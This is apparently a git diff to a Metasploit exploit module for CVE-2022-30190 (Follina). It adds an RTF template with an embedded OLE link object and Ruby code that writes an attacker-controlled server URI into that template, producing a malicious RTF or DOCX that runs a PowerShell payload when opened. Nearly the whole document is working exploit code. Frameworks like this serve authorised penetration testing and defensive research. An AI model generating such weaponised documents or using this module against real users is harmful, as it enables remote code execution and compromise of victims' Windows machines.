diff --git a/data/exploits/CVE-2022-30190/cve_2022_30190_rtf_template.rtf b/data/exploits/CVE-2022-30190/cve_2022_30190_rtf_template.rtf new file mode 100644 index 0000000000..afc697a138 --- /dev/null +++ b/data/exploits/CVE-2022-30190/cve_2022_30190_rtf_template.rtf @@ -0,0 +1,30 @@ +{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;} +\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033 +{\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033 +{\object\objautlink\rsltpict\objw4321\objh4321\objscalex1\objscaley1{\*\objclass REPLACE_WITH_URI_STRING}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 010500000200000009000000 +4f4c45324c696e6b000000000000000000000c0000 +d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff +ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff +ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff +ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff +fffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff +ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff +ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff +ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff +ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e5000000000000000000000000009e +70f1e98bd80103000000c00200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000 +0000000000000000000000006b0100000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000 +0000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000 +00000000000000000000000007000000f0000000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff +ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff +ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff +ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff +ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f313731383030383936380000000000f90000000903000000000000c00000000000004602000000e0c9ea79f9bace11 +8c8200aa004ba90bb20000REPLACE_WITH_URI_STRING_UTF16000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c0000000000000460200000021000100000000ffffffff0000000000000000000000000000000000000000ffffffff00000000000000 +0000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c00REPLACE_WITH_URI_STRING_ASCII +0000bbbbcccc4cREPLACE_WITH_URI_STRING_UTF16 +000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}}}}} +}}}} diff --git a/modules/exploits/windows/fileformat/word_msdtjs_rce.rb b/modules/exploits/windows/fileformat/word_msdtjs_rce.rb index e81e45c2bb..58443fd075 100644 --- a/modules/exploits/windows/fileformat/word_msdtjs_rce.rb +++ b/modules/exploits/windows/fileformat/word_msdtjs_rce.rb @@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::FILEFORMAT include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Post::File def initialize(info = {}) super( @@ -61,6 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote register_options([ OptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']), + OptEnum.new('OUTPUT_FORMAT', [true, 'Obfuscate JavaScript content.', 'docx', %w[docx rtf]]), OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true]) ]) end @@ -174,27 +176,50 @@ class MetasploitModule < Msf::Exploit::Remote Msf::Util::EXE.to_zip(@docx) end - def primer - print_status('Generating a malicious docx file') + def build_rtf + print_status('Generating a malicious rtf file') - @proto = (datastore['SSL'] ? 'https' : 'http') + uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html" + uri_space = 76 + if uri.length > 76 + fail_with(Failure::BadConfig, 'The total URI must be under 75 characters') + end + uri_ascii = uri.each_byte.map { |b| b.to_s(16) }.join + uri_ascii << '0' * ((uri_space * 2) - uri_ascii.length) + # This is terrible, but will work for a test + uri_utf16 = uri.each_byte.map { |b| '00' + b.to_s(16) }.join + uri_utf16 << '0' * ((uri_space * 4) - uri_utf16.length) + rtf_file_data = exploit_data('CVE-2022-30190', 'cve_2022_30190_rtf_template.rtf') + rtf_file_data.gsub!('REPLACE_WITH_URI_STRING_ASCII', uri_ascii) + rtf_file_data.gsub!('REPLACE_WITH_URI_STRING_UTF16', uri_utf16) + rtf_file_data.gsub!('REPLACE_WITH_URI_STRING', uri) + file_create(rtf_file_data) + end + + def build_docx + print_status('Generating a malicious docx file') template_path = get_template_path unless File.extname(template_path).downcase.end_with?('.docx') fail_with(Failure::BadConfig, 'Template is not a docx file!') end - print_status("Using template '#{template_path}'") @docx = unpack_docx(template_path) - print_status('Injecting payload in docx document') inject_docx - print_status("Finalizing docx '#{datastore['FILENAME']}'") file_create(pack_docx) + end + def primer + @proto = (datastore['SSL'] ? 'https' : 'http') + + if datastore['OUTPUT_FORMAT'] == 'rtf' + build_rtf + else + build_docx + end @payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true) - super end